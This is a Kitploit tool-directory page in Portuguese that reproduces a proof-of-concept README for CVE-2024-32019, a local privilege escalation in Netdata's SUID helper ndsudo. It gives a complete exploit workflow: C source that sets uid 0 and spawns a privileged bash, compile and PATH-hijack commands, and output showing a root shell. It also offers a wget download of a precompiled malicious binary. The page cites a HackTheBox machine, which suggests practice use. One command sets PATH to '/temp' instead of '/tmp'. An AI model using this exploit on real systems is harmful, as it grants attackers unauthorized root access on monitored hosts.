Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-32019-POC — Netdata ndsudo fluxo de trabalho de escalada de privilégio local e POC (CVE-2024-32019) | Kitploit
Ferramentas/GitHubGitHub/juanbelin/cve-2024-32019-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubjuanbelin/cve-2024-32019-poc

CVE-2024-32019-POC

Netdata ndsudo fluxo de trabalho de escalada de privilégio local e POC (CVE-2024-32019)

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32019-POC

Netdata ndsudo escalonamento de privilégios local fluxo de trabalho e PoC (CVE-2024-32019)

  • Fluxo de trabalho
  • Exploit automático
  • Recursos

Fluxo de Trabalho

[!TIP] Por favor, leia

Netdata é uma ferramenta que fornece monitoramento de aplicativos e sistemas, roda na porta 19999, fácil de encontrar:

root@kitploit:~
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State     

tcp        0      0 127.0.0.1:19999         0.0.0.0:*               LISTEN  

Esta vulnerabilidade (CVE-2024-32019) afeta as seguintes versões: >= v1.45.0, < v1.45.3, >= v1.44.0-60, < v1.45.0-169. Podemos fazer uma requisição para saber a versão no cabeçalho de resposta:

CVE-2024-32019-1

O exploit ocorre ao aproveitar um PATH Hijacking de um de seus plugins, ndsudo que geralmente está localizado em /opt/netdata/usr/libexec/netdata/ e que possui SUID.

root@kitploit:~
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
CVE-2024-32019-2

Podemos ver o que podemos fazer usando --help

root@kitploit:~
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help

ndsudo

(C) Netdata Inc.

A helper to allow Netdata run privileged commands.

  --test
    print the generated command that will be run, without running it.

  --help
    print this message.

The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

- Command    : nvme-smart-log
  Executables: nvme 
  Parameters : smart-log {{device}} --output-format=json

- Command    : megacli-disk-info
  Executables: megacli MegaCli 
  Parameters : -LDPDInfo -aAll -NoLog

- Command    : megacli-battery-info
  Executables: megacli MegaCli 
  Parameters : -AdpBbuCmd -aAll -NoLog

- Command    : arcconf-ld-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 LD

- Command    : arcconf-pd-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 PD

The program searches for executables in the system path.

Variables given as {{variable}} are expected on the command line as:
  --variable VALUE

VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
root@kitploit:~
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.

Como podemos ver, como o script contém vários comandos para escolher que irão procurar um executável, podemos aproveitar isso para criar nosso próprio executável com o nome de um dos executáveis dentro de um caminho que podemos adicionar à variável de ambiente PATH.

Netdata usa C, consequentemente, temos que fazer nosso script em C e compilá-lo.

CVE-2024-32019
root@kitploit:~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);
    perror("execl");
    return 1;
}
root@kitploit:~
gcc arcconf.c -o arcconf

Então, como discutido anteriormente, adicionamos o caminho do script ao $PATH

root@kitploit:~
test@test:/tmp$ PATH=/tmp:$PATH

Finalmente, simplesmente executamos o comando que está apontando para nosso executável malicioso (arcconf-pd-info -> arcconf ) e ele nos dará um shell privilegiado

root@kitploit:~
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root

Exploit automático

Você pode baixar o script malicioso C já compilado que lhe dará um bash como root, conforme mencionado no exemplo acima:

root@kitploit:~
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf 
root@kitploit:~
mv arcconf /tmp #Se seu alvo tiver conectividade com a Internet

scp ./arcconf test@test:/tmp/arcconf #Se seu alvo não tiver conectividade com a Internet
root@kitploit:~
PATH=:/temp:$PATH
root@kitploit:~
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info #O caminho do ndsudo pode mudar

Recursos

  • https://learn.netdata.cloud/docs/collecting-metrics/

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

  • https://app.hackthebox.com/machines/684

Baixar ferramenta